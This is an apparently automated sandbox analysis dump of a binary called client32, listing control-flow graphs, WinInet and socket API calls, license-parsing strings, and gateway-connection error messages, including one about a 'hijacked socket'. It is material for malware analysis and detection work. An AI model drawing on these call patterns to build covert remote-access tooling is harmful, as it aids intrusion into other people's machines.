1102a1d0-1102a1e3 1077->1083 1084 1102a1c9-1102a1ca FreeLibrary 1077->1084 1086 1102a18f-1102a194 1078->1086 1087 1102a06d-1102a075 1079->1087 1081->1082 1105 11029e06-11029e0a 1082->1105 1106 11029e0d-11029e19 1082->1106 1084->1083 1085->1040 1092 1102a196-1102a1ad GetProcAddress 1086->1092 1093 1102a1af-1102a1b5 1086->1093 1090 1102a077-1102a08e GetProcAddress 1087->1090 1091 1102a094-1102a09d 1087->1091 1090->1091 1095 1102a14e-1102a150 SetLastError 1090->1095 1100 1102a0a0-1102a0a2 1091->1100 1092->1093 1096 1102a1b7-1102a1b9 SetLastError 1092->1096 1093->1077 1098 1102a156-1102a15d 1095->1098 1096->1077 1101 1102a16c-1102a18d call 11027f00 * 2 1098->1101 1100->1098 1103 1102a0a8-1102a0ad 1100->1103 1101->1086 1103->1101 1107 1102a0b3-1102a0ef call 11110230 call 11027eb0 1103->1107 1105->1106 1110 11029e44-11029e49 1106->1110 1111 11029e1b-11029e1d 1106->1111 1129 1102a101-1102a103 1107->1129 1130 1102a0f1-1102a0f4 1107->1130 1113 11029e4b-11029e5c GetProcAddress 1110->1113 1114 11029e5e-11029e75 InternetConnectA 1110->1114 1116 11029e34-11029e3a 1111->1116 1117 11029e1f-11029e32 GetProcAddress 1111->1117 1113->1114 1119 11029ea1-11029eac SetLastError 1113->1119 1120 1102a017-1102a027 call 11162777 1114->1120 1121 11029e7b-11029e7e 1114->1121 1116->1110 1117->1116 1123 11029e3c-11029e3e SetLastError 1117->1123 1119->1120 1120->1060 1126 11029e80-11029e82 1121->1126 1127 11029eb9-11029ec1 1121->1127 1123->1110 1131 11029e84-11029e97 GetProcAddress 1126->1131 1132 11029e99-11029e9f 1126->1132 1133 11029ec3-11029ed7 GetProcAddress 1127->1133 1134 11029ed9-11029ef4 1127->1134 1137 1102a105 1129->1137 1138 1102a10c-1102a111 1129->1138 1130->1129 1136 1102a0f6-1102a0fa 1130->1136 1131->1132 1139 11029eb1-11029eb3 SetLastError 1131->1139 1132->1127 1133->1134 1140 11029ef6-11029efe SetLastError 1133->1140 1142 11029f01-11029f04 1134->1142 1136->1129 1143 1102a0fc 1136->1143 1137->1138 1144 1102a113-1102a129 call 110d12e0 1138->1144 1145 1102a12c-1102a12e 1138->1145 1139->1127 1140->1142 1147 1102a012-1102a015 1142->1147 1148 11029f0a-11029f0f 1142->1148 1143->1129 1144->1145 1150 1102a130-1102a132 1145->1150 1151 1102a134-1102a145 call 11162777 1145->1151 1147->1120 1155 1102a03c-1102a049 call 11162777 1147->1155 1153 11029f11-11029f28 GetProcAddress 1148->1153 1154 11029f2a-11029f36 1148->1154 1150->1151 1157 1102a15f-1102a169 call 11162777 1150->1157 1151->1101 1162 1102a147-1102a149 1151->1162 1153->1154 1160 11029f38-11029f40 SetLastError 1153->1160 1166 11029f42-11029f5b GetLastError 1154->1166 1155->1066 1157->1101 1160->1166 1162->1087 1167 11029f76-11029f8b 1166->1167 1168 11029f5d-11029f74 GetProcAddress 1166->1168 1170 11029f95-11029fa3 GetLastError 1167->1170 1168->1167 1169 11029f8d-11029f8f SetLastError 1168->1169 1169->1170 1172 11029fa5-11029faa 1170->1172 1173 11029fac-11029fb8 GetDesktopWindow 1170->1173 1172->1173 1174 1102a002-1102a007 1172->1174 1175 11029fd3-11029fef 1173->1175 1176 11029fba-11029fd1 GetProcAddress 1173->1176 1174->1147 1178 1102a009-1102a00f 1174->1178 1175->1147 1180 11029ff1 1175->1180 1176->1175 1177 11029ff6-1102a000 SetLastError 1176->1177 1177->1147 1178->1147 1180->1142
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(WinInet.dll,1EF76653,757323A0,?,00000000), ref: 11029BE5
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029C93
                                                                                                                                                    • _malloc.LIBCMT ref: 11029CB7
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
                                                                                                                                                    • GetLastError.KERNEL32 ref: 11029CF2
                                                                                                                                                    • _free.LIBCMT ref: 11029CFE
                                                                                                                                                    • _malloc.LIBCMT ref: 11029D07
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
                                                                                                                                                    • InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029D84
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029D91
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029D9B
                                                                                                                                                    • _free.LIBCMT ref: 11029DA5
                                                                                                                                                      • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                      • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029E3E
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
                                                                                                                                                    • InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029EA3
                                                                                                                                                    • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
                                                                                                                                                    • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 1102A083
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1102A150
                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102A1A2
                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1102A1B9
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1102A1CA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                                                                                    • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                                                                    • API String ID: 921868004-913974648
                                                                                                                                                    • Opcode ID: 672cd097590bfd03c9fe4a36dbc9c03aeb2e34a222513bbefa7f0796f77ae97c
                                                                                                                                                    • Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
                                                                                                                                                    • Opcode Fuzzy Hash: 672cd097590bfd03c9fe4a36dbc9c03aeb2e34a222513bbefa7f0796f77ae97c
                                                                                                                                                    • Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60
                                                                                                                                                    Function 110627B0 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                                                                                      • Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                                                                                    • _fgets.LIBCMT ref: 110628E2
                                                                                                                                                    • _strpbrk.LIBCMT ref: 11062949
                                                                                                                                                    • _fgets.LIBCMT ref: 11062A4C
                                                                                                                                                    • _strpbrk.LIBCMT ref: 11062AC3
                                                                                                                                                    • __wcstoui64.LIBCMT ref: 11062ADC
                                                                                                                                                    • _fgets.LIBCMT ref: 11062B55
                                                                                                                                                    • _strpbrk.LIBCMT ref: 11062B7B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                                                                                    • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                                                                                    • API String ID: 716802716-1571441106
                                                                                                                                                    • Opcode ID: 742ea8bdf19e8cca6d5bd37e3cbea73eeb9325f4fe67667d5bccebbacef3dcd8
                                                                                                                                                    • Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
                                                                                                                                                    • Opcode Fuzzy Hash: 742ea8bdf19e8cca6d5bd37e3cbea73eeb9325f4fe67667d5bccebbacef3dcd8
                                                                                                                                                    • Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91
                                                                                                                                                    Function 6CA8A980 Relevance: 56.4, APIs: 28, Strings: 4, Instructions: 389networkCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1971 6ca8a980-6ca8a9e7 call 6ca85840 1974 6ca8aa9c 1971->1974 1975 6ca8a9ed-6ca8a9f0 1971->1975 1976 6ca8aaa2-6ca8aaae 1974->1976 1975->1974 1977 6ca8a9f6-6ca8a9fb 1975->1977 1978 6ca8aab0-6ca8aac5 call 6caa28e1 1976->1978 1979 6ca8aac6-6ca8aacd 1976->1979 1977->1974 1980 6ca8aa01-6ca8aa06 1977->1980 1983 6ca8ab48-6ca8ab58 socket 1979->1983 1984 6ca8aacf-6ca8aad7 1979->1984 1980->1974 1982 6ca8aa0c-6ca8aa21 EnterCriticalSection 1980->1982 1988 6ca8aa89-6ca8aa9a LeaveCriticalSection 1982->1988 1989 6ca8aa23-6ca8aa2b 1982->1989 1985 6ca8ab5a-6ca8ab6f WSAGetLastError call 6caa28e1 1983->1985 1986 6ca8ab70-6ca8abc9 #21 * 2 call 6ca85e90 1983->1986 1984->1983 1990 6ca8aad9-6ca8aadc 1984->1990 2000 6ca8abe8-6ca8ac1f bind 1986->2000 2001 6ca8abcb-6ca8abe3 #21 1986->2001 1988->1976 1993 6ca8aa30-6ca8aa39 1989->1993 1990->1983 1994 6ca8aade-6ca8ab05 call 6ca8a5c0 1990->1994 1997 6ca8aa49-6ca8aa51 1993->1997 1998 6ca8aa3b-6ca8aa3f 1993->1998 2008 6ca8ad4a-6ca8ad69 EnterCriticalSection 1994->2008 2009 6ca8ab0b-6ca8ab2f WSAGetLastError call 6ca830a0 1994->2009 1997->1993 2004 6ca8aa53-6ca8aa5e LeaveCriticalSection 1997->2004 1998->1997 2002 6ca8aa41-6ca8aa47 1998->2002 2005 6ca8ac41-6ca8ac49 2000->2005 2006 6ca8ac21-6ca8ac40 WSAGetLastError closesocket call 6caa28e1 2000->2006 2001->2000 2002->1997 2007 6ca8aa60-6ca8aa88 LeaveCriticalSection call 6caa28e1 2002->2007 2004->1976 2012 6ca8ac59-6ca8ac64 2005->2012 2013 6ca8ac4b-6ca8ac57 2005->2013 2014 6ca8ad6f-6ca8ad7d 2008->2014 2015 6ca8ae50-6ca8ae80 LeaveCriticalSection GetTickCount InterlockedExchange 2008->2015 2021 6ca8ae82-6ca8ae92 call 6caa28e1 2009->2021 2023 6ca8ab35-6ca8ab47 call 6caa28e1 2009->2023 2020 6ca8ac65-6ca8ac83 htons WSASetBlockingHook call 6ca87610 2012->2020 2013->2020 2022 6ca8ad80-6ca8ad86 2014->2022 2015->2021 2029 6ca8ac88-6ca8ac8d 2020->2029 2026 6ca8ad88-6ca8ad90 2022->2026 2027 6ca8ad97-6ca8ae0f InitializeCriticalSection call 6ca88fb0 call 6caa0ef0 2022->2027 2026->2022 2031 6ca8ad92 2026->2031 2044 6ca8ae18-6ca8ae4b getsockname 2027->2044 2045 6ca8ae11 2027->2045 2034 6ca8ac8f-6ca8acc5 WSAGetLastError WSAUnhookBlockingHook closesocket call 6ca830a0 call 6caa28e1 2029->2034 2035 6ca8acc6-6ca8accd 2029->2035 2031->2015 2039 6ca8accf-6ca8acd6 2035->2039 2040 6ca8ad45 WSAUnhookBlockingHook 2035->2040 2039->2040 2043 6ca8acd8-6ca8acfb call 6ca8a5c0 2039->2043 2040->2008 2043->2040 2050 6ca8acfd-6ca8ad2c WSAGetLastError WSAUnhookBlockingHook closesocket call 6ca830a0 2043->2050 2044->2015 2045->2044 2050->2021 2053 6ca8ad32-6ca8ad44 call 6caa28e1 2050->2053
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 6CA85840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6CA88F91,00000000,00000000,6CACB8DA,?,00000080), ref: 6CA85852
                                                                                                                                                    • EnterCriticalSection.KERNEL32(6CACB898,?,00000000,00000000), ref: 6CA8AA11
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6CACB898), ref: 6CA8AA58
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6CACB898), ref: 6CA8AA68
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6CACB898), ref: 6CA8AA94
                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6CA8AB0B
                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AB4E
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AB5A
                                                                                                                                                    • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AB8E
                                                                                                                                                    • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8ABB1
                                                                                                                                                    • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8ABE3
                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AC18
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AC21
                                                                                                                                                    • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AC29
                                                                                                                                                    • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AC65
                                                                                                                                                    • WSASetBlockingHook.WSOCK32(6CA863A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AC76
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AC8F
                                                                                                                                                    • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AC96
                                                                                                                                                    • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AC9C
                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8ACFD
                                                                                                                                                    • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AD04
                                                                                                                                                    • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AD0A
                                                                                                                                                    • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AD45
                                                                                                                                                    • EnterCriticalSection.KERNEL32(6CACB898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA8AD4F
                                                                                                                                                    • InitializeCriticalSection.KERNEL32(-6CACCB4A), ref: 6CA8ADE6
                                                                                                                                                      • Part of subcall function 6CA88FB0: _memset.LIBCMT ref: 6CA88FE4
                                                                                                                                                      • Part of subcall function 6CA88FB0: getsockname.WSOCK32(?,?,00000010,?,03822CB0,?), ref: 6CA89005
                                                                                                                                                    • getsockname.WSOCK32(00000000,?,?), ref: 6CA8AE4B
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6CACB898), ref: 6CA8AE60
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA8AE6C
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 6CA8AE7A
                                                                                                                                                    Strings
                                                                                                                                                    • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6CA8AD14
                                                                                                                                                    • Connect error to %s using hijacked socket, error %d, xrefs: 6CA8AB17
                                                                                                                                                    • *TcpNoDelay, xrefs: 6CA8ABB8
                                                                                                                                                    • Cannot connect to gateway %s, error %d, xrefs: 6CA8ACA6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$ErrorLast$BlockingHookLeave$Unhookclosesocket$Entergetsockname$CountExchangeInitializeInterlockedTick_memsetbindhtonsinet_ntoasocket
                                                                                                                                                    • String ID: *TcpNoDelay$Cannot connect to gateway %s via web proxy, error %d$Cannot connect to gateway %s, error %d$Connect error to %s using hijacked socket, error %d
                                                                                                                                                    • API String ID: 692187944-2561115898
                                                                                                                                                    • Opcode ID: 8cdae3489ee2218474cab7370964292b630f331d07c86f03fdc241ed364896df
                                                                                                                                                    • Instruction ID: a27d9a6fc5a351437806ab4f2e56c4e7d984fa4c0113d44211d4b5c675d6a4f2
                                                                                                                                                    • Opcode Fuzzy Hash: 8cdae3489ee2218474cab7370964292b630f331d07c86f03fdc241ed364896df
                                                                                                                                                    • Instruction Fuzzy Hash: FCE1A271A01219AFDB14DF94D980BEDB3B5FF48304F1041AAE909A7680DB349EC98BA1
                                                                                                                                                    Function 11139ED0 Relevance: 54.7, APIs: 20, Strings: 11, Instructions: 474windowthreadCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2122 11139ed0-11139f05 2123 11139f12-11139f19 2122->2123 2124 11139f07-11139f0d GetCurrentThreadId 2122->2124 2125 11139f20-11139f3c call 11134830 call 11134310 2123->2125 2126 11139f1b call 11029950 2123->2126 2124->2123 2132 11139f42-11139f48 2125->2132 2133 1113a01b-1113a022 2125->2133 2126->2125 2136 1113a59a-1113a5b5 call 11162bb7 2132->2136 2137 11139f4e-11139faf call 11139a70 IsWindow IsWindowVisible call 11147060 call 1105e820 IsWindowVisible 2132->2137 2134 1113a0da-1113a0f0 2133->2134 2135 1113a028-1113a02f 2133->2135 2147 1113a0f6-1113a0fd 2134->2147 2148 1113a22f 2134->2148 2135->2134 2138 1113a035-1113a03c 2135->2138 2169 1113a011 2137->2169 2170 11139fb1-11139fb7 2137->2170 2138->2134 2142 1113a042-1113a051 FindWindowA 2138->2142 2142->2134 2146 1113a057-1113a05c IsWindowVisible 2142->2146 2146->2134 2150 1113a05e-1113a065 2146->2150 2151 1113a0ff-1113a109 2147->2151 2152 1113a10e-1113a12e call 1105e820 2147->2152 2153 1113a231-1113a242 2148->2153 2154 1113a275-1113a280 2148->2154 2150->2134 2156 1113a067-1113a08c call 11139a70 IsWindowVisible 2150->2156 2151->2154 2152->2154 2175 1113a134-1113a163 2152->2175 2158 1113a244-1113a254 2153->2158 2159 1113a25a-1113a26f 2153->2159 2160 1113a282-1113a2a2 call 1105e820 2154->2160 2161 1113a2b6-1113a2bc 2154->2161 2156->2134 2181 1113a08e-1113a09d IsIconic 2156->2181 2158->2159 2159->2154 2177 1113a2b0 2160->2177 2178 1113a2a4-1113a2ae call 1102d750 2160->2178 2164 1113a2be-1113a2ca call 11139a70 2161->2164 2165 1113a2cd-1113a2d5 2161->2165 2164->2165 2173 1113a2e7 2165->2173 2174 1113a2d7-1113a2e2 call 1106c340 2165->2174 2169->2133 2170->2169 2179 11139fb9-11139fd0 call 11147060 GetForegroundWindow 2170->2179 2183 1113a2e7 call 1112ddd0 2173->2183 2174->2173 2194 1113a165-1113a179 call 11081d30 2175->2194 2195 1113a17e-1113a191 call 11143e00 2175->2195 2177->2161 2178->2161 2201 11139fd2-11139ffc EnableWindow call 11132120 * 2 EnableWindow 2179->2201 2202 11139ffe-1113a000 2179->2202 2181->2134 2186 1113a09f-1113a0ba GetForegroundWindow call 11132120 * 2 2181->2186 2188 1113a2ec-1113a2f2 2183->2188 2223 1113a0cb-1113a0d4 EnableWindow 2186->2223 2224 1113a0bc-1113a0c2 2186->2224 2189 1113a2f4-1113a2fa call 11132a10 2188->2189 2190 1113a2fd-1113a306 2188->2190 2189->2190 2198 1113a314 call 111326b0 2190->2198 2199 1113a308-1113a30b 2190->2199 2194->2195 2215 1113a17b 2194->2215 2217 1113a193-1113a1a4 GetLastError call 11147060 2195->2217 2218 1113a1ae-1113a1b5 2195->2218 2206 1113a319-1113a31f 2198->2206 2199->2206 2207 1113a30d-1113a312 call 11132780 2199->2207 2201->2202 2202->2169 2211 1113a002-1113a008 2202->2211 2219 1113a325-1113a32b 2206->2219 2220 1113a429-1113a434 call 11139600 2206->2220 2207->2206 2211->2169 2213 1113a00a-1113a00b SetForegroundWindow 2211->2213 2213->2169 2215->2195 2217->2218 2227 1113a1b7-1113a1d2 2218->2227 2228 1113a228 2218->2228 2229 1113a331-1113a339 2219->2229 2230 1113a3db-1113a3e3 2219->2230 2238 1113a436-1113a448 call 110642e0 2220->2238 2239 1113a455-1113a45b 2220->2239 2223->2134 2224->2223 2233 1113a0c4-1113a0c5 SetForegroundWindow 2224->2233 2241 1113a1d5-1113a1e1 2227->2241 2228->2148 2229->2220 2236 1113a33f-1113a345 2229->2236 2230->2220 2234 1113a3e5-1113a423 call 1103f920 call 1103f960 call 1103f980 call 1103f940 call 11110000 2230->2234 2233->2223 2234->2220 2236->2220 2242 1113a34b-1113a362 call 111101b0 2236->2242 2238->2239 2259 1113a44a-1113a450 call 11142d90 2238->2259 2245 1113a461-1113a468 2239->2245 2246 1113a58a-1113a592 2239->2246 2247 1113a1e3-1113a1f7 call 11081d30 2241->2247 2248 1113a1fc-1113a209 call 11143e00 2241->2248 2256 1113a384 2242->2256 2257 1113a364-1113a382 call 11057eb0 2242->2257 2245->2246 2254 1113a46e-1113a487 call 1105e820 2245->2254 2246->2136 2247->2248 2263 1113a1f9 2247->2263 2248->2228 2265 1113a20b-1113a226 GetLastError call 11147060 2248->2265 2254->2246 2274 1113a48d-1113a4a0 2254->2274 2266 1113a386-1113a3d2 call 1110fff0 call 1104d790 call 1104ecd0 call 1104ed40 call 1104d7d0 2256->2266 2257->2266 2259->2239 2263->2248 2265->2154 2266->2220 2301 1113a3d4-1113a3d9 call 110ec320 2266->2301 2283 1113a4a2-1113a4a8 2274->2283 2284 1113a4cd-1113a4d3 2274->2284 2285 1113a4aa-1113a4c8 call 11147060 GetTickCount 2283->2285 2286 1113a4d9-1113a4e5 GetTickCount 2283->2286 2284->2246 2284->2286 2285->2246 2286->2246 2290 1113a4eb-1113a52b call 11143a50 call 11147af0 call 11143a50 call 110261a0 2286->2290 2308 1113a530-1113a535 2290->2308 2301->2220 2308->2308 2309 1113a537-1113a53d 2308->2309 2310 1113a540-1113a545 2309->2310 2310->2310 2311 1113a547-1113a571 call 1112d6e0 2310->2311 2314 1113a573-1113a574 FreeLibrary 2311->2314 2315 1113a57a-1113a587 call 11162777 2311->2315 2314->2315 2315->2246
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 11139F07
                                                                                                                                                    • IsWindow.USER32(000A0036), ref: 11139F65
                                                                                                                                                    • IsWindowVisible.USER32(000A0036), ref: 11139F73
                                                                                                                                                    • IsWindowVisible.USER32(000A0036), ref: 11139FAB
                                                                                                                                                    • GetForegroundWindow.USER32 ref: 11139FC6
                                                                                                                                                    • EnableWindow.USER32(000A0036,00000000), ref: 11139FE0
                                                                                                                                                    • EnableWindow.USER32(000A0036,00000001), ref: 11139FFC
                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 1113A00B
                                                                                                                                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 1113A049
